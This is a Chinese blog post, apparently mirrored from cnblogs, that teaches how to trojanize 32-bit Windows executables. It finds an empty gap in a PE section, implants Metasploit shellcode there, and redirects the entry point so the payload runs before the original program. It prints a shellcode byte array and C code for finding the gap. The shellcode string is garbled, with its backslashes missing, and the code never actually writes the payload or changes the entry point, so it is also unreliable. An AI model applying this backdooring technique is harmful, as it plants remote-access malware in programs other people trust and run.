zoukankan      html  css  js  c++  java
  • C/C++ 搜索缝隙并插入ShellCode

    将ShellCode放入变量中,然后修改插入可执行文件名称,运行后即可将shellCode插入到EXE中,并设置好装载地址,程序运行后会先上线,然后在执行原始的代码,在使用metaspoit生成shellcode时,运行方式需要指定为线程运行,如果为进程运行,则会卡在ShellCode的循环代码中,原始程序则无法弹出,也就起不到插入的目的了。

    插入原理: 首先计算出ShellCode的实际大小,然后将文件指针移动到文件末尾,从文件末尾开始循环查找,找到符合大小的空隙,并开始插入ShellCode代码,当插入完成后,将程序的OEP地址设置为ShellCode执行地址,执行结束后,再跳回原区段继续执行源代码,从而实现插入恶意代码的目的。

    该插入程序目前只适用于32位EXE可执行文件,生成的ShellCode也必须为32位,64位需要自己修改一下。

    #include <stdio.h>
    #include <stddef.h>
    #include <windows.h>
    
    char shellcode[] = "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
    "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
    "xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
    "x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
    "x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
    "x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
    "x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
    "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
    "x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
    "x8dx5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4c"
    "xf0xb5xa2x56x6ax00x53xffxd5";
    
    DWORD FindSpace(LPVOID lpBase, PIMAGE_NT_HEADERS pNtHeader)
    {
    	PIMAGE_SECTION_HEADER pSec = (PIMAGE_SECTION_HEADER)
    		(((BYTE *)&(pNtHeader->OptionalHeader) + pNtHeader->FileHeader.SizeOfOptionalHeader));
    	DWORD dwAddr = pSec->PointerToRawData + pSec->SizeOfRawData - sizeof(shellcode);
    	dwAddr = (DWORD)(BYTE *)lpBase + dwAddr;
    	LPVOID lp = malloc(sizeof(shellcode));
    	memset(lp, 0, sizeof(shellcode));
    	while (dwAddr > pSec->Misc.VirtualSize)
    	{
    		int nRet = memcmp((LPVOID)dwAddr, lp, sizeof(shellcode));
    		if (nRet == 0)
    			return dwAddr;
    		dwAddr--;
    	}
    	free(lp);
    	return 0;
    }
    
    int main(int argc, char* argv[])
    {
    	HANDLE hFile,hMap = NULL;
    	LPVOID lpBase = NULL;
    
    	hFile = CreateFile("c://lyshark.exe",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
    	hMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,0);
    	lpBase = MapViewOfFile(hMap,FILE_MAP_READ | FILE_MAP_WRITE,0,0,0);
    
    	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBase;
    	PIMAGE_NT_HEADERS pNtHeader = NULL;
    	PIMAGE_SECTION_HEADER pSec = NULL;
    	IMAGE_SECTION_HEADER imgSec = { 0 };
    
    	if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
    	{
    		return -1;
    	}
    	pNtHeader = (PIMAGE_NT_HEADERS)((BYTE*)lpBase + pDosHeader->e_lfanew);
    	DWORD dwAddr = FindSpace(lpBase, pNtHeader);
    	DWORD dwOep = pNtHeader->OptionalHeader.ImageBase + pNtHeader->OptionalHeader.AddressOfEntryPoint;
    	CloseHandle(hMap);
    	CloseHandle(hFile);
    	system("pause");
    	return 0;
    }
    

    版权声明: 本博客,文章与代码均为学习时整理的笔记,博客中除去明确标注有参考文献的文章,其他文章 均为原创 作品,转载请务必 添加出处 ,您添加出处是我创作的动力!

    博主警告:如果您恶意转载本人文章,则您的整站文章,将会变为我的原创作品,请相互尊重!
  • 相关阅读:
    2016中国大学生程序设计竞赛
    HDU 1671 Phone List (Trie·数组实现)
    Codeforces Round #367 (Div. 2) Hard problem
    UVA 133 The Dole Queue
    SG函数模板
    Codeforces Round #366 (Div. 2) C Thor(模拟+2种stl)
    [Offer收割]编程练习赛4 A 满减优惠
    CF #365 (Div. 2) D
    Codeforces Round #365 (Div. 2) Chris and Road
    codeblocks AStyle修改格式和快捷键
  • 原文地址:https://www.cnblogs.com/LyShark/p/14430198.html
Copyright © 2011-2022 走看看